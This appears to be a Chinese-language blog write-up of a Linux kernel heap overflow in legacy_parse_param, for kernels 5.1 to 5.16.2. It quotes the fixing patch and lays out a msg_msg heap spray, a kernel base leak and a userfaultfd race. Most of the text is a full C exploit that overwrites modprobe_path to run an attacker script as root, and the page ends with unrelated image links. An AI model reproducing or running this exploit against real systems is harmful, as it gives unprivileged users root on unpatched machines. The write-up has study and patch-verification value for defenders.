影響版本:Linux-v5.1~v5.16.2
測試版本:Linux-5.11.22,由于懶得搞環境,所以直接用的 bsauce 大佬提供的 測試環境
看看?patch:
diff --git a/fs/fs_context.c b/fs/fs_context.c
index b7e43a780a625b..24ce12f0db32e5 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)param->key);}- if (len > PAGE_SIZE - 2 - size)
+ if (size + len + 2 > PAGE_SIZE)return invalf(fc, "VFS: Legacy: Cumulative options too large");if (strchr(param->key, ',') ||(param->type == fs_value_is_string &&這里 len/size 都是無符號數,所以當 2+size > PAGE_SIZE 時,則 PAGE_SIZE - 2 - size 是一個很大的數從而繞過檢查,這里會導致堆溢出。
溢出 kmem_cache:kmalloc-4k
利用思路:
1)堆噴 msg_msg,觸發第一次漏洞溢出修改 m_ts 從而泄漏內核基地址
2)堆噴 msg_msg,觸發第二次漏洞溢出配合 userfaultfd修改 m_next 實現任意地址寫 modprobe_path
注:bsauce 佬提供的測試環境內核版本為 v5.11.22,普通用戶是無法直接使用 userfaultfd 的,我看 bsauce 佬直接寫了個 fuse 驅動模塊,然后利用的 fuse 去增大競爭窗口。但是這里為了方便,我直接在設置了普通用戶可以使用 userfaultfd,這里只是為了簡化利用。
echo 1 > /proc/sys/vm/unprivileged_userfaultfd第一版垃圾 exp 如下:這里調整一下堆噴策略效果應該會好很多
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif#define SPARY_MSG_NUMS 8
int hijack_idx;
size_t modprobe_path;
int fs_fds[SPARY_MSG_NUMS];int fsopen(const char* fs_name, unsigned int flags)
{return syscall(__NR_fsopen, fs_name, flags);
}int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf(" %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");}printf(" ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}struct msg_buf {long m_type;char m_text[1];
};struct msg_header {void* l_next;void* l_prev;long m_type;size_t m_ts;void* next;void* security;
};void get_flag(){system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改為了 /tmp/xsystem("chmod +x /tmp/x");system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二進制文件system("chmod +x /tmp/dummy");system("/tmp/dummy"); // 執行非法格式的二進制文件 ==> 執行 modeprobe_path 指向的文件 /tmp/xsleep(0.3);system("cat /flag");exit(0);
}void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{long uffd;struct uffdio_api uffdio_api;struct uffdio_register uffdio_register;uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);uffdio_api.api = UFFD_API;uffdio_api.features = 0;if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);uffdio_register.range.start = (long long)addr;uffdio_register.range.len = len;uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}char copy_src[0x1000];
void* handler(void* arg)
{struct uffd_msg msg;struct uffdio_copy uffdio_copy;long uffd = (long)arg;for(;;){int res;struct pollfd pollfd;pollfd.fd = uffd;pollfd.events = POLLIN;if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);res = read(uffd, &msg, sizeof(msg));if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);puts("[+] Now in userfaultfd handler");size_t buf = modprobe_path - 8;char* x = &buf;char str[] = "/tmp/x";printf("hijack_idx ==> %d\n", hijack_idx);fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", "012345678901234567890AAAAAAAA", 0);fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", x, 0);memset(copy_src, 0, sizeof(copy_src));strncpy(copy_src, str, strlen(str));strncpy(copy_src+8, str, strlen(str));uffdio_copy.src = (long long)copy_src;uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);uffdio_copy.len = 0x1000;uffdio_copy.mode = 0;uffdio_copy.copy = 0;if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);}
}size_t do_leak()
{char X_X = 1;int fs_fd;char buf[0x2000];char msg_buffer[0x2000];int msg_qid[SPARY_MSG_NUMS];size_t kernel_offset;struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;memset(msg_buffer, 0, sizeof(msg_buffer));msg_buf->m_type = 1;if (!X_X) goto X_X_Label;for (int i = 0; i < SPARY_MSG_NUMS / 2; i++){if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;*(uint64_t*)(msg_buf->m_text+8) = i;if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");}fs_fd = fsopen("ext4", 0);if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);for (int i = 0; i < 273; i++){fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);}fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);for (int i = SPARY_MSG_NUMS / 2; i < SPARY_MSG_NUMS; i++){if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;*(uint64_t*)(msg_buf->m_text+8) = i;if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");}for (int i = 0; i < SPARY_MSG_NUMS*2; i++){if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");}fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);goto GO;X_X_Label:fs_fd = fsopen("ext4", 0);if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);for (int i = 0; i < 273; i++){fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);}fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);for (int i = 0; i < SPARY_MSG_NUMS; i++){if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;*(uint64_t*)(msg_buf->m_text+8) = i;if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");}for (int i = 0; i < SPARY_MSG_NUMS*2; i++){if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");}fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);GO:kernel_offset = -1;size_t vim_mtype;for (int i = 0; i < SPARY_MSG_NUMS; i++){memset(buf, 0, sizeof(buf));if (msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR) >= 0x2000-0x30-0x8){for (int k = 0; k < 0x1000 / 8; k++){size_t addr = *(uint64_t*)(buf+0x1000+k*8);vim_mtype = ((struct msg_buf*)buf)->m_type;if (addr > 0xffffffff81000000 && (addr&0xfff) == 0x770){hexx("vim_mtype", vim_mtype);kernel_offset = addr - 0xffffffff81f36770;hexx("kernel_offset", kernel_offset);break;}}if (!X_X) msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, vim_mtype, 0);//binary_dump("OOB READ DATA", buf, 0x2000);break;}}return kernel_offset;
}void hijack_modprobePath()
{char buf[0x2000];char msg_buffer[0x2000];int msg_qid[SPARY_MSG_NUMS*2];size_t kernel_offset;struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;memset(msg_buffer, 0, sizeof(msg_buffer));msg_buf->m_type = 1;for (int i = 0; i < SPARY_MSG_NUMS; i++){if ((msg_qid[i*2] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;*(uint64_t*)(msg_buf->m_text+8) = i*2+1;if (msgsnd(msg_qid[i*2], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");fs_fds[i] = fsopen("ext4", 0);if (fs_fds[i] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);for (int j = 0; j < 273; j++){fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);}if ((msg_qid[i*2+1] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");*(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;*(uint64_t*)(msg_buf->m_text+8) = i*2+1;if (msgsnd(msg_qid[i*2+1], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");// if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
// *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
// *(uint64_t*)(msg_buf->m_text+8) = i;
// if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");}for (int i = 0; i < SPARY_MSG_NUMS; i++){msgrcv(msg_qid[i], buf, 0x1000+0x20-0x30-0x8, 1, 0);}char* uffd_buf;pthread_t thr[SPARY_MSG_NUMS];for (hijack_idx = 0; hijack_idx < SPARY_MSG_NUMS; hijack_idx++){msg_buf = (struct msg_buf*)buf;msg_buf->m_type = 1;if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");uffd_buf = NULL;uffd_buf = mmap(0, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);if (uffd_buf <= 0) err_exit("FAILED to mmap uffd_buf");register_userfaultfd(&thr[hijack_idx], uffd_buf+0x1000, 0x1000, handler);msg_buf = (struct msg_buf*)(uffd_buf+0x30);if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");msg_buf->m_type = 1;if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");munmap(uffd_buf, 0x2000);}}int main(int argc, char** argv, char** envp)
{bind_core(0);pid_t pid;int pipe_fd[2];pipe(pipe_fd);pid = fork();if (!pid){unshare(CLONE_NEWNS|CLONE_NEWUSER);size_t kernel_offset;kernel_offset = do_leak();if (kernel_offset == -1) err_exit("FAILED to leak kernel_offset");modprobe_path = 0xffffffff8346c160 + kernel_offset;hexx("modprobe_path", modprobe_path);hijack_modprobePath();write(pipe_fd[1], "X", 1);exit(0);} else if (pid < 0) {err_exit("FAILED to fork a new process");} else {char buf[1];read(pipe_fd[0], buf, 1);get_flag();}return 0;
}效果如下:這里堆噴策略比較垃圾,成功率極低,后面再改改吧。
)
![[FPGA 學習記錄] 數碼管動態顯示](http://pic.xiahunao.cn/[FPGA 學習記錄] 數碼管動態顯示)
)
)
)
